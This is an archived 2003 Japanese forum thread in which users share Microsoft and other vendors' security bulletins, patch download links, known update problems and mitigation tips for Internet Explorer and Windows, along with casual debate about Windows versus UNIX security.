・呼ばれた側のページのスクリプトで相対 URL を使用している
・呼んだ側のページの URL と呼ばれた側のページの URL のパスの階層が異なる

原因
Internet Explorer は、これまで相対 URL は呼んだ側の URL を基準にしていましたが、
誤った Q822925 の修正により、呼ばれた側の URL が基準とされるようになったため、
相対 URL でアクセスしようとした先のコンテンツが見つからず、HTTP 404 エラーが発生します。

なお、MS03-032の修正プログラムにおける既知の問題は >>753 の他に下記が報告されています。
詳細はKB 822925( http://support.microsoft.com/default.aspx?scid=kb;ja;822925 )を参照してください。

・マイクロソフト サポート技術情報 827641
[BUG] セキュリティ修正プログラム MS03-032 をインストール後、ASP.NET で
"Server Not Available" というエラー メッセージが表示される
http://support.microsoft.com/default.aspx?scid=kb;JA;827641
・MS03-032修正HotFixのアンインストールでエラーが発生する
・Windows Server 2003 または Windows XP 64-Bit Edition Version 2003 を実行する
コンピュータで IEの累積的な修正のアンインストールの順番に制限あり
・Windows 2000/XP に重要な更新 822925 をインストールした後に、重要な更新 813489
または 818529 をインストールすることが禁止されないためセキュリティホールのある
ファイルに置き換わる問題。822925HotFixを再度インストールすることにより解決。
・IE 5.01 SP3 を実行する Windows 2000 SP3 ベースのコンピュータに重要な更新
822925 の IE 5.5 SP2 用修正プログラムをインストールすることが禁止されない問題。
対処は重要な更新 818529 の IE 5.5 SP2 用パッケージをツールを用いて削除したうえで、
重要な更新 818529 の IE 5.01 SP3 用修正プログラムをインストールする。
詳細はKB822925を参照。
・Windows XP/2000/NT/Me/98SE を実行するコンピュータでは、重要な更新 818529
を削除した後、Internet Explorer 用の以前の累積的な修正プログラム (重要な更新 813489 など)
を削除することはできない。(仕様)

その他雑多な情報

マイクロソフト サポート技術情報 - 825062
(Windows 2000) Service Pack 4 では回復コンソールを使用して Service Pack を削除できる
http://support.microsoft.com/default.aspx?scid=kb;ja;825062

マイクロソフト サポート技術情報 - 823862
Windows 2000 SP4 を実行しているコンピュータへのログオン時、ユーザー ポリシーが適用されない
http://support.microsoft.com/default.aspx?scid=kb;ja;823862

マイクロソフト サポート技術情報 - 262839
Windows 2000 Service Pack Update.exe のコマンドライン スイッチ
http://support.microsoft.com/default.aspx?scid=kb;ja;262839
(SP3 SP4からスイッチが追加されています)

ユーザー固有のフォルダが開かれる現象について
http://support.microsoft.com/default.aspx?scid=kb;ja;829493

最近のMS必死だなw

ココ、イイぜ！
http://m-no1.jp/a.php?w=26

いや、ダメだったよ。

WIN98で6．0使ってる場合、
パッチ全部当ててたら、
fusianaトラップを回避できるのか？

>>760
2002 年 2 月 11 日 Internet Explorer の累積的な修正プログラム (MS02-005)
http://www.microsoft.com/japan/technet/security/bulletin/MS02-005.asp
を適用すればfusianasanトラップ、いわゆる「ユーザーがスクリプトを無効にして
いる場合でも、Web ページがスクリプトを実行することができる脆弱性」を回避
できますが、全てのパッチを適用することをお勧めします。
というか、すでに98は新たに見つかった脆弱性に対するHotFixは無償では提供
されないはずなので、有償サポートを受けるか、より新しいOSに更新されることを
お勧めします。

なお、単に名前欄にfusianasanと入れるとIPが出るのは「2ちゃんねるの仕様」となっております。

サポート情報 - ウイルスバスター2002 製品サポートの終了について
http://www.trendmicro.co.jp/support/news.asp?id=310

ウイルスバスター 2003 リアルセキュリティおよびウイルスバスター2004
インターネットセキュリティの発売に伴い、ウイルスバスター2002に関する
サポートを2003年12月末日をもって終了させていただきます。
(略)
また、ウイルスバスター2002のサポート終了に伴い、以下のOSについても
サポートを終了させていただきます。ウイルスバスター2003 リアルセキュリティ
およびウイルスバスター2004 インターネットセキュリティでは動作保証外と
なりますのでご注意ください。
Microsoft(R) Windows95 (OSR2を含む)

注意：
ウイルスバスター2004 インターネットセキュリティでは、
Microsoft(R) WindowsNT環境についても動作保証いたしません。

>>761
そうなのかぁー。
非常に参考になりました。
今日、98のパッチの329414が新しく出たけど、これでも無理なのかな?

>>763
> 今日、98のパッチの329414が新しく出たけど、これでも無理なのかな?
だから、fusianasanは2chの仕様。

>>764
キミは勘違いしているようだが、
漏れの言ってるのは、あるリンクを踏むと
どこかのスレに勝手に自分がfusianaさんで勝手に
書き込みされるという、ありえないトラップの事なのだ。

>>763 329414ってMDACのセキュリティホールの件のはずなんだけど、
これってとっくにパッチ出てるはず何だけど・・・どっちにしろ関係ないと思われ。
累積的な修正プログラムじゃない限り、以前の修正プログラムは内包されないはずだから。

スクリプトによる自動POSTやIMGタグやハイパーリンクからのWEBバグの事言ってるならそれも仕様。
OSでどーにか出来る問題じゃない。設定を変える事でで回避する事は出来るが。
嫌ならスクリプト切って画像を表示しないようにしてリンクは踏まない様にしとくこと。

>>766
漏れもびっくりしたんだが、何故1年前のパッチが
今頃通知されたんだろう？
最近悪用されてるのかな？

オフィス2000のSP3をこの前入れたからかな？

>>768-769 わからん。まぁいいじゃないか。

エンタープライズ：ニュース 2003/10/03 07:31:00 更新
DNSに影響、パッチ未発行の脆弱性を悪用するトロイの木馬「QHosts」
http://www.zdnet.co.jp/enterprise/0310/03/epn04.html

まだパッチが提供されていないIEのセキュリティホールを悪用するトロイの木馬
「QHosts」が登場した。PCのDNS設定が大きく変更され、特定のWebサイトに
誘導されるおそれがある。
日本時間の10月2日未明より、複数のセキュリティ関連メーリングリストで、不正な
形式のDNSパケットが異常に増加し、中にはタイムアウトが発生してWebサイトへ
のアクセスが困難になるケースもあるとの報告が寄せられた。SANSのInternet
Storm Centerでもこの兆候をつかみ、情報を公開している。またCERT/CCもこの
兆候を踏まえ、ドキュメントを公開している。
これまでの情報を総合すると、一連の現象を引き起こした犯人は、新種のトロイの
木馬「QHosts」（QHosts-1）と見られる。このトロイの木馬は、Internet Explorer（IE）
5.01／5.5／6を搭載した広範なWindowsプラットフォームに感染するという。

>>770
毎度おつかれさん

MS03-040 に関する情報
「MS03-040: Internet Explorer 用の累積的な修正プログラム (828750) 」に
関する要約情報です。

概要
====
この修正プログラムは、Internet Explorer に影響を及ぼすセキュリティ上の
問題を排除する累積的な修正プログラムです。
以前に公開された MS03-032: Internet Explorer 用の累積的な修正プログラム
(822925) で修正された問題に加えて、新たに 2 つの問題を排除します。

影響を受ける製品
================
・Microsoft Internet Explorer 6.0 for Windows Server 2003
・Microsoft Internet Explorer 6、6 Service Pack 1
・Microsoft Internet Explorer 5.5 Service Pack 2
・Microsoft Internet Explorer 5.01 Service Pack 3 または Service Pack 4
for Windows 2000

修正プログラム
==============
・Internet Explorer 6 Service Pack 1 (WU)
http://download.microsoft.com/download/A/F/6/AF6F74C4-81D5-43B8-93F4-7FB9959C4AB7/q828750.exe

・Internet Explorer 6 Service Pack 1 for Windows Server 2003 (WU)
http://download.microsoft.com/download/3/9/E/39E995C4-303C-46CF-9528-1569C176BA88/WindowsServer2003-KB828750-x86-JPN.exe
この修正プログラムは Windows Server 2003 専用になります

・Internet Explorer 6 (WU)
http://download.microsoft.com/download/7/9/E/79EEFE32-83C2-46D0-99C1-F3FD8EF22843/q828750.exe
この修正プログラムは Windows XP (Service Pack 無し) にインストールできま
す。

・Internet Explorer 5.5 Service Pack 2 (WU)
http://download.microsoft.com/download/D/4/7/D4757318-9C9B-4016-A67C-AFEB69E9D342/q828750.exe

・Internet Explorer 5.01 Service Pack 3 または Service Pack 4 (WU)
http://download.microsoft.com/download/C/5/F/C5FA09EC-1035-4A85-AD1F-5E279DC439E3/q828750.exe
この修正プログラムは Windows 2000 SP3 または Windows 2000 SP4 の環境に
インストールすることができます。

注意:
64bit 版の Windows をお使いのお客様は、次の修正プログラムの適用をお願いいたします。

・Windows XP Internet Explorer 6 SP1 (64bit) (WU)
http://download.microsoft.com/download/B/B/2/BB27B5C4-DF5E-417C-9D40-E488A23E7F19/q828750.exe

・Windows Server 2003 Internet Explorer 6 Service Pack 1 (64bit) (WU)
http://download.microsoft.com/download/B/F/6/BF6EF58A-F070-4152-8493-C72EB5554046/WindowsServer2003-KB828750-ia64-JPN.exe

(WU) のマークの付いている修正プログラムは Windows Update からインストールすることもできます。
修正プログラムのダウンロード、または、インストール方法については次のサイトを参照ください。
・修正プログラムのダウンロード方法
http://www.microsoft.com/japan/security/square/guard/a04g16.asp
・修正プログラム インストール方法
http://www.microsoft.com/japan/security/square/guard/a04g17.asp

詳細
====
この修正プログラムをインストールすることにより、悪意のあるユーザーによる
以下の攻撃を防ぐことができます。

(緊急) Internet Explorer が Web サーバーから返されたオブジェクトの種類を
適切に確認できない問題により、ユーザーのコンピュータで任意のプログラムが
実行される可能性があります。
(緊急) Internet Explorer が XML データの処理中に Web サーバーから返された
オブジェクトの種類を適切に確認できない問題により、
ユーザーのコンピュータで任意のプログラムが実行される可能性があります。

対策が行われていないシステムがインターネットなどのネットワークを通じて他
のコンピュータと接続している場合、この問題を悪用した攻撃を受けることがあ
ります。この攻撃は、受動的攻撃という悪意のあるユーザーから送られた HTML
形式の電子メールからも攻撃を受ける可能性があります。この攻撃は、ハッカー
またはクラッカーと呼ばれる悪意のあるユーザーや、ワームといった自動的な攻
撃を目的とした悪意のあるプログラムから行われることがあります。

この脆弱性を悪用されることにより、以下のような実害を受ける事が考えられます。

・実行する意図の無いアプリケーションが動作させられる可能性があります
(ハードディスクのフォーマットやワームなど)
・アプリケーションが異常終了させられる可能性があります。
・意図しないスクリプトが動作させられる可能性があります。

日本語による詳細については、ただいま準備中です。それまでの間、英語情報をご参照ください。
・MS03-040: Cumulative Patch for Internet Explorer (828750)
http://www.microsoft.com/technet/security/bulletin/MS03-040.asp
イラストを交えたセキュリティ情報は以下をご覧ください。
・MS03-040: Internet Explorer の重要な更新
http://www.microsoft.com/japan/security/security_bulletins/MS03-040e.asp

>>772->>775は、
http://www.microsoft.com/japan/technet/security/bulletin/ms03-040.asp
ですね。
しかも、>>770問題を防御するものです。

勝手に >>772-775 の続き
技術的な説明 :
これは累積的な修正プログラムで、("Internet"が脱字してます)Explorer 5.01、
5.5 および 6 用に以前にリリースされたすべての修正プログラムを含みます。
また、新たに確認された次の脆弱性を排除します。
・IEがPopup Windowの呼び出し時に、Web サーバーから返されたObject Typeを、
適切に判断をしないために発生する脆弱性。この脆弱性を悪用されると、攻撃者
により任意のコードがユーザーのシステムで実行される可能性があります。(略)
・IEが XML データ接続を行っている間、Web サーバーから返されたObject Typeを、
適切に判断をしないために発生する脆弱性。この脆弱性を悪用されると、攻撃者
により任意のコードがユーザーのシステムで実行される可能性があります。(略)
さらに、IEが、エクスプローラ 制限ゾーンの範囲内でダイナミック HTML (DHTML）の
動作を処理する手順が変更を受けました。これにより、攻撃者が上で説明した
二つの独立した脆弱性のいずれかを悪用しても、IEのインターネット ゾーンの
セキュリティコンテキストで実行されてしまう可能性があります。 また、攻撃者が
攻撃を仕組むためにWindows Media Player (WMP) を悪用することが考えられます。
さらに、攻撃者がこの脆弱性を悪用するために、HTML 形式の電子メールが作成
される可能性があります。
(略)
このセキュリティ修正プログラムを適用することに加えて、サポート技術情報
828026 (日本語版は準備中) で紹介されている Windows Media Player の更新も
同時にインストールすることを推奨します。この更新プログラムは、ダウンロード
センターと同様に、Windows Update からも現在サポートされている全ての Windows
Media Player に関して入手可能です。これはセキュリティ修正プログラムでは
ありませんが、DHTML の動作を悪用した攻撃から URL を開かれることを防御する
ための Windows Media Player に関する動作の更新が含まれています。特に、
他のセキュリティ ゾーンからローカル コンピュータ ゾーンの中の URL を開かれる
処理を制限します。

マイクロソフト サポート技術情報 - 828026
Windows Media Player Script Command Patch
http://support.microsoft.com/default.aspx?scid=kb;EN-US;828026

SUMMARY
Microsoft has released an update to Windows Media Player. This article
discusses the issues that the update fixes, and how to obtain this update.

1. The code now recognizes three registry keys. These keys would be
found under HKEY_CURRENT_USER\SOFTWARE\Microsoft\MediaPlayer\Preferences.
This patch does not create these keys. If the keys do not exist,
the default value is used.

　a. PlayerScriptCommandsEnabled ? Turns on/off URL script commands in
the standalone player. Default is OFF.
　b. WebScriptCommandsEnabled ? Turns on/off URL script commands in
the embedded player. Default is ON.
　c.URLAndExitCommandsEnabled ? Turns on/off URLAndExit script commands.
Default value is ON.

2. In addition to the registry keys, logic was added so that URL script
commands can not take the user from a less trusted zone to a more trusted zone.
The zone of origin is either the zone of the content being played, or
the web page the player is embedded in, which ever is less trusted.
The destination zone is the zone of the URL flip. The table below represents
this graphically. The vertical axis represents the zone of origin.
The horizontal axis is the destination zone.

Zone　　　　　　　　Local Machine　Intranet　Trusted　Internet　Untrusted
Local Machine
Intranet　　　　　　　　　X
Trusted　　　　　　　　　X　　　　　　　　X
Internet　　　　　　　　 .X　　　　　　　　X　　　　　X
Untrusted　　　　　　　 .X　　　　　　　 .X　　　　　X　　　　　X　　　　　X
X = URL is not launched

http://headlines.yahoo.co.jp/hl?a=20031006-00000065-kyodo-bus_all
また穴ぼこ「緊急」だとさ

閲覧ソフトに不具合　マイクロソフト「ＩＥ」

　【ニューヨーク５日共同】米ソフトウエア最大手マイクロソフトは５日までに、閲覧ソフト「インターネット・エクスプローラー」（ＩＥ）に安全上の不具合が見つかったと発表、同社ホームページを通じてソフトを更新するよう呼び掛けた。
　対策の重要度は４段階のうち最高の「緊急」でＩＥ「５・０１」、同「５・５」、同「６・０」が対象。ハッカーなどがあらかじめ細工したホームページにアクセスすると、外部からパソコンを不正操作される恐れがあるとしている。（共同通信）

またかよ.....

遅杉

参考情報
http://www.asahi-net.or.jp/~FV6N-TNSK/gates/bangai59.html

わけわからん。
金あんねやから
『これ最強2003.10.6』
『うちもコレ2003.10.6』
『03.10.6ゲイツも入れたばっか』
とかってファイル名にして欲しい。

Windows Update したら、更新しなければいけないと出たものが、
IE6だけだった。Win98 IE5.01 の漏れには関係ないのですか？

IEをOSに統合してまで、他のブラウザ潰ししてこれですか？
ドザは悔しくないのですか？
毎日そんなに暇ですか？
友達いますか？

悔しいけど、今更マックでもないだろ、と釣られてみる。

漏れマカーだけど、MacはどうでもいいからちゃんとしたWindowsOS出て欲しい。

>>787
> IEをOSに統合してまで、他のブラウザ潰ししてこれですか？

他のブラウザ潰すためにIEをOSに統合した結果、こんな阿鼻叫喚の状態になりました。

>787
すんません。ドザって誰？

水死した人のことだよ

DOS USER のこと。

>>780-787 あの、みなさん？このニュースって>>772-779なんですけど、、、

マイクロソフト サポート技術情報 - 824208
自動更新機能で修正プログラムがダウンロードされずイベント ID 16 がログに出力される
http://support.microsoft.com/default.aspx?scid=kb;ja;824208

トラブル・メンテナンス速報
http://support.microsoft.com/japan/support/sokuho/default.asp#Record_74

Office のアップデートの不具合と回避策
更新日： 2003/10/6

「Office のアップデート」を実行すると、"Warning You are viewing this page with an...."
というメッセージが表示され、「Office のアップデート」を先に進めることができなくなる現象
が一部のお客様の環境で確認されておりましたが、この問題の修正が完了致しましたので
ご報告いたします。

ご迷惑をおかけしてしまい、大変申し訳ございませんでした。

以下は、更新情報です。念のため。

HTML コンバータのバッファ オーバーランにより、コードが実行される (823559) (MS03-023)
登録日 : 2003/07/10 更新日 : 2003/10/06
http://www.microsoft.com/japan/technet/security/bulletin/MS03-023.asp

深刻度 :
Windows 98 緊急
Windows 98 Second Edition 緊急
Windows Me 緊急
Windows NT Server 4.0 緊急
Windows NT Server 4.0, Terminal Server Edition 緊急
Windows 2000 緊急
Windows XP 緊急
Windows Server 2003 警告

警告 :
本修正プログラムのインストール後 Internet Explorer 6 Service Pack 1 に
アップグレードしたお客様は、再度本修正プログラムをインストールする必要が
あります。修正プログラムは本ページの 「修正プログラム」 の欄で紹介されている
ダウンロード サイト、または Windows Update のサイトから入手することができます。

更新履歴 :
2003/10/06: 「警告」 の欄を更新し、本修正プログラムのインストール後
Internet Explorer 6 Service Pack 1 にアップグレードしたお客様は、再度
本修正プログラムをインストールする必要があることを追加しました。

ZDNN：WindowsへのJava搭載、2004年9月まで延長
http://www.zdnet.co.jp/news/0310/07/xert_msjava.html

米Microsoftは10月7日、Sun MicrosystemsのJavaプログラミング言語を
Windowsに搭載する期間を、当初の計画から9カ月延長し、顧客がソフトウェア
プラットフォームを移行するための期間を引き伸ばすことを明らかにした。

同社は当初、Javaで書いたプログラムをWindows上で走らせるための契約に
基づいて、2003年末でWindowsへのJava搭載を終了する予定だった。
同社とSunは、これを2004年9月30日まで延長するとの共同声明を発表した。

あぼーん

800ｹﾞｯﾄ

>>797
ありがとうございます。
＞本修正プログラムのインストール後 Internet Explorer 6 Service Pack 1 に
＞アップグレードしたお客様は、再度本修正プログラムをインストールする必要が
＞あります。

これ知りませんでした。

>>796
> ご迷惑をおかけしてしまい、大変申し訳ございませんでした。

MSがこの文言を掲出するのは、すごく珍しいのでは？

そうとも言えるが、その前にあるべき謝罪がまったくないからね。
脳内誤変換です。もしくは、辞書登録です。

２日まえ、ウインドウズアップデイトしたら、
jpegファイルを、ふつうにウインドウでみて拡大すると
３段階目でフリーズするようになってしまった。

これもその内、Updateするのかな？
http://itpro.nikkeibp.co.jp/free/ITPro/USNEWS/20031008/3/

■ Adobe SVG Viewer (ASV) Windows 版の 3.0 以前に 3 つの欠陥 (various)
http://www.st.ryukoku.ac.jp/%7Ekjm/security/memo/2003/10.html#20031008_ASV

セキュリティホールmemoによれば、Adobe SVG Viewer (ASV) Windows 版の
3.0 以前に 3 つの欠陥があるとのことです。

Adobe SVG Viewerは、WebブラウザでSVGをレンダリングするためのプラグインです。
SVGとはScalable Vector Graphicsの略から来る、拡大縮小が綺麗に行え、機械可読
可能なWebに適したXML形式で記述される新しい画像形式のことで、W3Cによって
規格がとりまとめられています( http://www.w3.org/Graphics/SVG/ )。

欠陥は、Adobe SVG Viewer (ASV) 3.01 for Windows で修正されており、
http://www.adobe.com/svg/viewer/install/mainframed.html から入手できます。
上記ページにはいくつかのバージョンがあり、また、日本語サイトの方ではバージョン3.0
しかまだ提供されていないようですのでご注意下さい。

MSが不具合を出すたびに700円貰えてたら今頃大金持ちだぜ

ttp://pc.watch.impress.co.jp/docs/2003/1010/ms.htm
＞Microsoft、Windows XP SP2に新セキュリティ技術
＞〜修正プログラム適用前でも攻撃から防御可能に

信じていいのかな？

必要な物だけを起動させるのでは？

こんなのも出てるな。
http://www.st.ryukoku.ac.jp/~kjm/security/m..rchive/full-disclosure/2003.10/msg00711.html

> Security Community,
>
> The following information references a serious security threat to you or
> your organization if the proper measures have not been taken to prevent
> its destructive intent.
>
> Description of Issue
> --------------------
> VigilantMinds has successfully validated the claims regarding the latest
> Microsoft Remote Procedure Call (RPC) vulnerability. Specifically,
> VigilantMinds has validated that hosts running fully patched versions of
> the following Microsoft operating systems REMAIN subject to denial of
> service attacks and possible remote exploitation:
>
> 　　* Microsoft Windows XP Professional
> 　　* Microsoft Windows XP Home
> 　　* Microsoft Windows 2000 Workstation
>
> Although it has not been verified at this time, other versions of
> Microsoft Windows are also suspected to be subject to this
> vulnerability.
>
> As with the prior RPC vulnerability (MS03-039), these attacks can occur
> on TCP ports 135, 139, 445 and 593; and UDP ports 135, 137, 138 and 445.

既出の全パッチを当てていても例の RPC/DCOM 穴 (MS03-039) はまだ残り
DoS 攻撃のほか任意コードの実行も可能だろうとの事。

Shields Up!のSteve Gibson作DCOM無効化ユーティリティー
http://grc.com/dcom/
ボタンを押すだけでDCOMの有効／無効を切り替えられる。
あてにならないMSのパッチ当てるよりまずDCOM無効化が吉

後を絶たないIEのセキュリティ・ホール，設定変更などで“自衛”を
続々見つかるパッチの不具合，パッチ未公開のホールを狙うウイルスも
今週のSecurity Check [Windows編]　（第105回，2003年10月15日）
http://itpro.nikkeibp.co.jp/members/ITPro/SEC_CHECK/20031014/1/

でた〜〜〜〜〜〜
『Windowsに5種類の危険なセキュリティ・ホール，Windows Updateの実施を』
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20031016/135619/

>>813
窓ｳﾌﾟﾃﾞﾄしたら、いきなり５個位更新されててちょっとびっくり。

MSのサイトから要約を持ってこようかとも思ったのですが、
セキュリティホールmemoが良くまとまっているし、MSのサイトは誰もが
見るべきと言うことで、セキュリティホールmemoのリンク先だけ書いておきます。
ああ、もちろん>>813の件です。

■ 木曜日は Windows Update の日 (今月から月刊 Windows Update)
(Microsoft, 2003.10.16)
http://www.st.ryukoku.ac.jp/%7Ekjm/security/memo/2003/10.html#20031016_wu

457 名前：名無しさん＠４周年 投稿日：03/10/17 20:42 ID:sDNC94iF
　インターネット上のwebサーバはWindowsよりUNIX系OSで立てた物が多いが
ここまで修正パッチに追われることも、頻繁にワームに感染して無駄なトラフィック
を垂れ流すこともない。

　一方Windowsのセキュリティ問題はOS構造そのものに起因しているので、一から
作り直さない限り、このセキュリティパッチ充て地獄からは逃れられない。

　IEのような一ネットワークアプリをOSにくくりつけるのを止めるだけでも、安全度は
飛躍的にアップすると思われるが、独禁法のがれのためにIEはOSの一部と言い切って
しまった以上、いまさらOSとIEを切り離すことはできない。

　仕方がないのでMSは定期アップデイトという対処療法をユーザーに押しつけることにした。

ホントは対症療法って言わない？

くううううううっっっっっ。

地獄ってホドでもないけど。

システム管理担当はまさに地獄につきおとされているワケだが

UNIXだとパッチも何もいらないと思っている厨ﾊｹｰﾝ

少なくとも NT 3.5 、4.0 、2kはNSAのC2を取得している。高度なセキュリティが実装
されていてもデフォルトで無効になってることこそが問題。

>>827
> UNIXだとパッチも何もいらないと思っている厨ﾊｹｰﾝ

よく読め。ここまでひどくはない、とは書いてあるがパッチ不要なんて書いてないだろ。


> 少なくとも NT 3.5 、4.0 、2kはNSAのC2を取得している。高度なセキュリティが実装
> されていてもデフォルトで無効になってることこそが問題。

NTのころ、さかんにNSAのC2取得を自慢してたけど、「正し、ネットワークに繋がってい
ない状態であること」という条件付きであることがバレて大恥かいたんだよな。

> UNIXだとパッチも何もいらないと思っている厨ﾊｹｰﾝ 　<文盲ﾊｹｰﾝ

ドザ＝どざえもん

「OSの構造に起因」ってよく言うけど、どういう構造なんだろうねぇ。＞教えて偉い人
だいたい、9xとNTって構造全く違うのに9xの時代から変わらず言ってるよねぇ。

C2に関しては眉唾物程度と言うことで。だいたいC2って低い方のランクじゃなかったっけ・・・

Windows UpdateとかWIndows Installerはまだ良くできてる方なんだと思う。
じゃなかったら何でapt-getとかup2dateとかがLinuxではやり出すのか。
なぜtar ball展開してmake installからrpmやパッケージ方式に進化しているのか。


ま、どっちもどっちってことで。

Windows XP SP2の遅れは新セキュリティ技術「Springboard」のせい
http://itpro.nikkeibp.co.jp/free/NT/NEWS/20031016/4/

米Microsoftがどうして「Windows XP Service Pack 2（SP2）のリリースに時間かかる」
としているのか，その理由が明らかになってきた。同社は次期バージョンのWindows
であるLonghorn（開発コード名）で採用する予定だったセキュリティ技術の一部を，
Windows XP SP2に盛り込もうとしている。これにより，Windows XP SP2の開発が遅れて
いるのだ。Windows XP SP2のセキュリティ水準は，デフォルトのWindows XPとLonghorn
の中間点に位置するようになるだろう。

■ MS03-043: メッセンジャ サービスのバッファ オーバーランにより、コードが実行される (828035)
(Microsoft, 2003.10.16)
http://www.st.ryukoku.ac.jp/%7Ekjm/security/memo/2003/10.html#20031020_ms03-043
修正プログラムがあるので適用すればよい。現在 Windows NT 4.0 Workstation および
Windows 2000 SP2 用の修正プログラムは Windows Update では適用できないようだ。
MS03-043 から個別に取得し、適用する必要がある。

回避するには、メッセンジャサービスを無効にすればよい。ほとんどの人は無効にして
構わないだろう。 Windows Server 2003 では、デフォルトで無効になっている。無効にする
方法は MS03-043 で説明されている。

なんかセキュリティホールmemo Watchになっちゃってますけど(^^;;

■ Cross Site Java applets (bugtraq, Tue, 21 Oct 2003 06:24:35 +0900)
http://www.st.ryukoku.ac.jp/%7Ekjm/security/memo/2003/10.html#20031021_Java
　Sun の JRE 1.4.2_01 に欠陥。別々のドメインから読み込まれた、署名されていない
アプレットが、JDK の文書化されていない変数を介してデータを共有できてしまう、という指摘。
1.4.2 系列の最新は 1.4.2_02 なのだが、こちらではどうなのか不明。

■ Opera HREF escaped server name overflow (bugtraq, Mon, 20 Oct 2003 23:39:48 +0900)
http://www.st.ryukoku.ac.jp/~kjm/security/ml-archive/bugtraq/2003.10/msg00203.html
　Opera 7.11 / 7.20 の、少なくとも Windows 版と Linux 版に欠陥。
A タグの HREF 属性の処理において buffer overflow が発生する。このため、悪意ある
web ページ作成者や HTML メール送信者によって任意のコードを実行させることが可能となる。
　Opera 7.21 で修正されている。しかし、Opera 7.21 press releases (opera.com) には security
なんて文字はどこにもない。また Changelog for Opera 7.21 for Windows (opera.com) には
Privacy and security
・ Updated to latest version of OpenSSL
としか書かれていない。この会社のセキュリティへの取りくみははあいかわらず低いレベルに
保たれているようだ。
　日本語版の Opera 7.21 はまだないようですね。

>>828
いつもありがとうございます。
今、Operaをインストールしようとしているところでした。

>>829
Win用日本語版Opera7.21はリリースされたわけだが。

>>830
www.opera.comでは入手できるみたいですね。
www.jp.opera.comは7.20なんですけどね。

>>828
＞Sun の JRE 1.4.2_01
java -versionしたらﾋﾞﾝｺﾞだった…。

#セキュリティmemoにRSSがあったらまとめて見られて便利なのになぁ

「第二のMSBlast」がやって来る？
http://www.zdnet.co.jp/enterprise/0310/24/epn07.html

Microsoftが先週、初の月例セキュリティアップデートの際に公表した五つの
「緊急」の脆弱性のうちの一つを使って、Windowsマシンをクラッシュする方法
を示した実証コードが公開され、専門家の間で懸念を呼んでいる。

Microsoftが最近発表した脆弱性を実証するプログラムがリリースされたことから、
パッチの適用を済ませていない企業はトラブルに巻き込まれる恐れがある――。
セキュリティの専門家らがそう指摘している。

今週セキュリティメーリングリスト上で公開されたこのプログラムは、Windowsの
「メッセンジャーサービス」機能が抱える欠陥を利用してWindowsベースの
コンピュータをクラッシュさせる。この脆弱性は現行のほとんどすべてのWindows
システムに見られるものであることから、セキュリティ専門家らは、攻撃者がこの
欠陥を突いて多数のコンピュータの制御権を奪う手段を考案するのも時間の問題
だろうと懸念を示している。

窓板住人注：Messenger Service は、MSN Messenger/Windows Messengerとは異なるものです。

「MS03-042」や「MS03-043」のパッチに不具合があり修正される
〜特定の環境化で適用中にハングアップする不具合を修正
http://internet.watch.impress.co.jp/cda/news/2003/10/31/977.html

１週間、何もないままだと逆に不安

>>835
> １週間、何もないまま
Windows Updateは週刊から月刊になったんで、
予定通りならさ来週あたり。
さて、何本立てになるでしょうか(w

月一になったんですか、なるほど。
836さんありがと

>>836-837
次の水曜日（12日）じゃね？

プロダクト セキュリティ 警告サービスのメールより
> 今月より、セキュリティ情報を毎月第 2 水曜日に公開するようにいたしました。
> (初回である今月は、第 3 水曜日の公開となりました)

まぁ、新着だけじゃなく重大なアップデートなどもあれば随時書き込みすると言うことで。

マイクロソフト サポート技術情報 - 828041
[OFF2003] 特定のOfficeArtを含むドキュメントで発生する問題の Office 2003 修正プログラムの概要
http://support.microsoft.com/?kbid=828041

この資料は以下の製品について記述したものです。
Microsoft Office 2003, All Editions

概要
マイクロソフトは、Microsoft Office 2003 の修正プログラムをリリースしました。この修正プログラムに
より、OfficeArt の図形を含む Microsoft Office PowerPoint 2003、Microsoft Office Word 2003、
または、Microsoft Office Excel 2003 のドキュメントを以前のバージョンの Microsoft Office で
開いて保存した場合に発生する問題が修正されます。
この資料では、Office 2003 修正プログラム (KB828041) のダウンロードとインストールの方法に
ついて説明します。

現象
フリーフォームなどで作成した特定の OfficeArt の図形を含む Microsoft Office PowerPoint 2003、
Microsoft Office Word 2003、または、Microsoft Office Excel 2003 のドキュメントをOffice XP で開き、
[図形描画] ツール バーを使用して、フリーフォームの図形の線または塗りつぶしを変更し、一旦保存
します。すると、空の複合プロパティがドキュメントに保存されることがあります。その後、その
ドキュメントを Microsoft Office 97 または Microsoft Office 2000 で開き、再度保存すると、内部
テーブルに変更が発生します。そのドキュメントを 再度Office 2003 で開くと、次のいずれかの現象が
発生することがあります。
　・ドキュメントを開くことができず、エラー メッセージが表示されます。
　・ドキュメントは開かれますが、OfficeArt の図形が欠落し、エラー メッセージが表示されます。
　・ドキュメントは開かれますが、OfficeArt の図形が欠落し、その際エラー メッセージは表示されません。

本現象は、上記現象の手順での利用に限り発生します。フリーフォームの図形などを Office XP で
編集していない場合や、Office XP で編集した場合でも Microsoft Office 97 または Microsoft Office
2000 で再度保存していない場合の、通常のドキュメントの交換の場合は本現象は発生しません。

保守

今月の月刊Windows Updateは3件です。
さらにOffice Updateが必要なセキュリティホールも報告されました。ご注意下さい。

でははじめます(かなり出遅れたけど

Internet Explorer 用の累積的なセキュリティ更新 (824145) (MS03-048) 印刷
登録日 : 2003/11/12　更新日 : 2003/11/12
http://www.microsoft.com/japan/technet/security/bulletin/MS03-048.asp

このセキュリティ情報の対象となるユーザー : MicrosoftR Internet ExplorerR をインストールしているお客様
脆弱性の影響 : リモートでコードが実行される
最大深刻度 : 緊急
推奨する対応策 : お客様はこのセキュリティ更新を直ちにインストールして下さい
含まれる過去の修正プログラム : この更新は、マイクロソフト セキュリティ情報 MS03-040 で提供された累積的な更新を含みます。
警告 : なし
テストしたソフトウェアおよび修正プログラムのダウンロード先

影響を受けるソフトウェア :
Microsoft Windows 98 Second Edition
Microsoft Windows Millennium Edition
Microsoft Windows NT Workstation 4.0, Service Pack 6a
Microsoft Windows NT Server 4.0, Service Pack 6a
Microsoft Windows NT Server 4.0, Terminal Server Edition, Service Pack 6
Microsoft Windows 2000, Service Pack 2, Service Pack 3, Service Pack 4
Microsoft Windows XP, Service Pack 1
Microsoft Windows XP 64 bit Edition
Microsoft Windows XP 64 bit Edition Version 2003
Microsoft Windows Server 2003
Microsoft Windows Server 2003 64 bit Edition

テストした Microsoft Windows コンポーネント :
影響を受けるコンポーネント : PC/AT
Internet Explorer 6 Service Pack 1
Internet Explorer 6 Service Pack 1 (64-Bit Edition)
Internet Explorer 6 Service Pack 1 for Windows Server 2003
Internet Explorer 6 Service Pack 1 for Windows Server 2003 (64-Bit Edition)
Internet Explorer 6 Gold
Internet Explorer 5.5 Service Pack 2
